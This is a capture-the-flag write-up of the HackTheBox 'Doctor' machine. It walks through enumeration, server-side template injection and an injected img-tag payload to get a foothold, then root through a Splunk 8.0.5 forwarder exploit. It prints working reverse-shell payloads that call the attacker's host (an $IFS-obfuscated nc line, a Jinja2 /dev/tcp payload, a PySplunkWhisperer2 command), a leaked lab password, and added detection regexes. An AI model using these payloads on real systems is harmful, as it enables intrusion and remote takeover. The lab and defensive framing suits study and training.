Doctor – HackTheBox Writeup
IP: 10.10.10.209
Difficulty: Easy
Summary: Doctor is a Linux box that can be exploited using Server-Side Template Injection (SSTI) or Cross-Site Request Forgery (CSRF). The Splunk service, which runs as root, is then exploited to escalate privileges to root using a Splunk 8.0.5 exploit.
Information Gathering
Performing an Nmap scan to enumerate the ports and services running on the target, we use the following command:
nmap -sC -sV -oN doctor.nmap 10.10.10.209
Ports 22, 80 and 8089 are open. It can be observed that port 8089 is running Splunk’s service and that the OS is Linux.
Enumeration
Browsing the “10.10.10.209” page, we can find an email address and its domain.
Let’s add that to the hosts file.
vi /etc/hosts
10.10.10.209 doctors.htb
Visiting the doctors.htb page redirects us to a “Doctor’s Secure Messaging” login page.
Before testing for SQLi, let’s register and log in to check the features of this platform.
After logging in, we can create a new message by clicking on the “New Message” link on the navbar.
The content is shown on the page after it is posted, so it is being reflected.
Let’s check the source!
The source reveals that a so-called “archive” page is under testing.
When the “/archive” page is visited, we see a blank page. Let’s check the source again!
We find that the title is being stored in the XML document as a title object nested under item. Since the title we input is written to the document, let’s check if the input is being embedded insecurely (Server-Side Template Injection).
Server-Side Template Injection (SSTI)
These attacks succeed against systems that embed user input (dynamic data) in a fixed template (like XML) without proper sanitization or sandboxing.
We can test for SSTI with an arithmetic operation.
{{7*'7'}}
Let’s use this payload in the title of a new message and check if the result of the payload, 49, is reflected in the XML.
The source of archive reflects the result 49 in the XML object.
The template engine running on the server can be confirmed by running the following command.
{{7*'7'}}
The result is 49 again. This confirms that the web application is using either the Twig or the Jinja2 template engine.
Cross-Site Request Forgery (CSRF)
To test for CSRF, a link with the address of my Python web server was posted.
We receive a GET request from the target on the Python server.
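As an added example (not code from the box or from this writeup), here is the bug class behind the injection above written in Jinja2, beside its fix: the vulnerable function concatenates the message title into the template source, while the fixed one keeps the template constant and passes the title as data. The XML layout of the archive page is assumed.

```python
# Added example: the bug class behind the SSTI above, in Jinja2, beside its fix.
# The XML layout of the archive page is assumed, not taken from the box.
from jinja2 import Environment, StrictUndefined

PROBE = "{{7*7}}"  # the arithmetic probe used above


def render_archive_vulnerable(title: str) -> str:
    """Concatenates the user-supplied title INTO the template source, so any
    {{ ... }} it contains is evaluated by the engine (the injection point)."""
    template_source = "<item><title>" + title + "</title></item>"
    return Environment().from_string(template_source).render()


def render_archive_fixed(title: str) -> str:
    """Keeps the template source constant and passes the title as data: the
    engine treats it as a plain string, and autoescape neutralises markup."""
    env = Environment(autoescape=True, undefined=StrictUndefined)
    template = env.from_string("<item><title>{{ title }}</title></item>")
    return template.render(title=title)


if __name__ == "__main__":
    print(render_archive_vulnerable(PROBE))   # probe is evaluated: 49
    print(render_archive_fixed(PROBE))        # probe is stored as text
    print(render_archive_fixed("<b>hi</b>"))  # markup is escaped
```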
Exploitation with CSRF
Let’s deliver the CSRF exploit. This is similar to delivering an XSS payload. We do not need any external host here, so I just used my lhost as a dummy.
<img src="http://10.10.15.206/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.15.206'$IFS'1337')>
The above payload uses “nc.traditional”, as simply issuing “nc” didn’t work. It also uses the Internal Field Separator (IFS), a special shell variable that holds the characters used to separate fields. The default value of this variable is space. This was done because using normal spaces didn’t work.
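From the defender’s side, the two probes seen in this section ({{...}} template expressions and $IFS-style command substitution) are easy to spot in web server access logs. The scanner below is an added example, not part of the writeup, and the log lines it reads are constructed.

```python
# Added example: flag SSTI probes and shell command substitution in
# combined-format access logs. The log lines are constructed, not from the box.
import re
from urllib.parse import unquote

SAMPLE_LOG = (
    '10.10.15.206 - - [10/Oct/2020:12:00:01 +0000] "POST /post/new HTTP/1.1" 302 0\n'
    '10.10.15.206 - - [10/Oct/2020:12:00:05 +0000] "GET /archive?title=%7B%7B7*7%7D%7D HTTP/1.1" 200 512\n'
    '10.10.15.206 - - [10/Oct/2020:12:00:09 +0000] "GET /?u=%24(id%24IFS-a) HTTP/1.1" 404 162\n'
    '10.10.14.3 - - [10/Oct/2020:12:01:00 +0000] "GET /home HTTP/1.1" 200 1024\n'
)

# client, timestamp, method, URI and status from a combined-log line
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+)[^"]*" (?P<status>\d{3})'
)

RULES = {
    # {{ 7*7 }}, {% ... %} or ${...}: template syntax inside a request
    "ssti_probe": re.compile(r"\{\{.*?\}\}|\{%.*?%\}|\$\{.*?\}"),
    # $( ... ), backticks or $IFS: shell substitution / the IFS space trick
    "shell_substitution": re.compile(r"\$\(|`[^`]*`|\$\{?IFS\}?"),
}


def scan_access_log(text: str) -> list:
    """Return one finding per (line, rule) whose decoded URI matches a rule."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-log line; skip rather than guess
        uri = unquote(m.group("uri"))  # decode once so %7B%7B becomes {{
        for name, rx in RULES.items():
            if rx.search(uri):
                findings.append(
                    {"line": lineno, "client": m.group("client"),
                     "rule": name, "uri": uri}
                )
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['client']} {f['rule']} {f['uri']}")
```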
We get a shell!
Exploitation with SSTI
After some googling, the simplest payload I could find to get a shell is:
{{request.application.globals.builtins.import('os').popen('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.y.z.w/port 0>&1"').read()}}
Listen with netcat.
nc -lvnp 1234
Launch our payload in the title and visit the archive page.
{{request.application.globals.builtins.import('os').popen('/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.15.206/1234 0>&1"').read()}}
We get a shell!
To get an interactive shell, the following commands are run:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo
fg
web@doctor:~$ export TERM=screen
We are user ‘web’, but we need to be user ‘Shaun’ to read the flag.
Getting User
Let’s fetch linpeas.sh and run it on the target.
wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
web@doctor:~$ wget http://10.10.15.206:8000/linpeas.sh
web@doctor:~$ bash linpeas.sh
Shaun’s password was found in the webserver’s logs!
Let’s check if this password can be used to log in as Shaun.
web@doctor:~$ su shaun
Password: Guitar123
shaun@doctor:~$ cat user.txt
We were able to log in and read the flag.
Pwned user!
Privilege Escalation
From the initial Nmap scan, we can try enumerating Splunk. When the linpeas.sh script was run, it was observed that the service was running as root. Visiting “https://10.10.15.206:8089/” we see some links.
When login is prompted, the credentials of Shaun worked.
Nothing useful was found there. The header shows that it is Splunk 8.0.5.
A Google search for “Splunk 8.0.5 exploit” led me to “Abusing Splunk Forwarders For RCE and Persistence”.
The article says that “Splunk Universal Forwarder Agent (UF) allows authenticated users to send commands or scripts to the agents through Splunk API”.
To exploit this vulnerability, PySplunkWhisperer2 was used in the article. Let’s use the same.
git clone https://github.com/cnotin/SplunkWhisperer2
cd SplunkWhisperer2
pip install -r requirements.txt
cd PySplunkWhisperer2
nc -lvnp 1222
python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.15.206 --username shaun --password Guitar123 --payload 'nc.traditional -e /bin/sh '10.10.15.206' '1222''
Pwned root!